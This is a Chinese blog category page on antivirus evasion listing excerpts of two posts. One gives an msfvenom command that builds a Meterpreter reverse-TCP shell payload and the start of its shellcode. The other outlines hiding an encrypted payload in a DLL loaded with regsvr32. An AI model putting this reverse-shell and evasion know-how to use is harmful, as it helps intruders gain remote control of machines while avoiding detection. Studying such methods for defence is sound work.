![](https://img-blog.csdnimg.cn/20201014180756922.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
免杀
文章平均质量分 77
「已注销」
这个作者很懒,什么都没留下…
展开
-
从meterpreter工作原理到免杀方式的分析
Meterpreter 工作原理msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=31012 -f c > test2.cunsigned char buf[] ="\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x89\xe5""\x8b\x52\x0c\x8b\x52\x14\x0f\xb7\x4原创 2021-03-05 01:43:42 · 1235 阅读 · 1 评论 -
msfvenom payload 免杀简单实践
免杀简单实践实验各种渗透框架的后门,结果很多文件放到硬盘上就开始报毒,这样的话根本很难实际使用,网上搜索各种免杀工具,据发布有些时间的似乎也都不行,自己稍微熟悉点的可能是dll这一块,看到有通过加密payload然后再打包成dll,最后用regsvr32 加载执行的思路,感觉可以是实践下,好歹这个可以自己写下程序。选择payload这里选择msf的经典payload:windows/meterpreter/reverse_tcp//生成c形式的payloadmsfvenom -a x86 -原创 2021-02-22 13:45:18 · 911 阅读 · 0 评论